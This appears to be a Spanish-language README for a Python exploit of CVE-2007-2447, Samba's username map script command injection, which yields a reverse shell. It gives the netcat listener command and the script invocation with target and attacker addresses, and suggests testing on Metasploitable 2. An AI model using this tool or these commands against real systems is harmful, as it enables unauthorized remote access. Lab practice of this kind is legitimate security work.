
Exploit en Python para CVE-2007-2447 que activa la inyección de comandos en el script de mapeo de nombres de usuario de Samba para abrir una shell inversa en objetivos vulnerables.
Para probar el script, recomiendo la máquina virtual "Metasploitable 2" disponible aquí. El script mostrará una reverse shell si el exploit funciona. Para obtener la conexión, simplemente abra una sesión de netcat como:
netcat -lnvp <port>
py CVE-2007-2447.py 192.168.1.38 1337 192.168.1.14
y en mi netcat:
netcat -lnvp 1337
Resultado:
netcat:
alt text
y en el script:
alt text
Usé un payload de una cheat-sheet. El enlace está disponible aquí. Puedes reemplazarlo con otros payloads.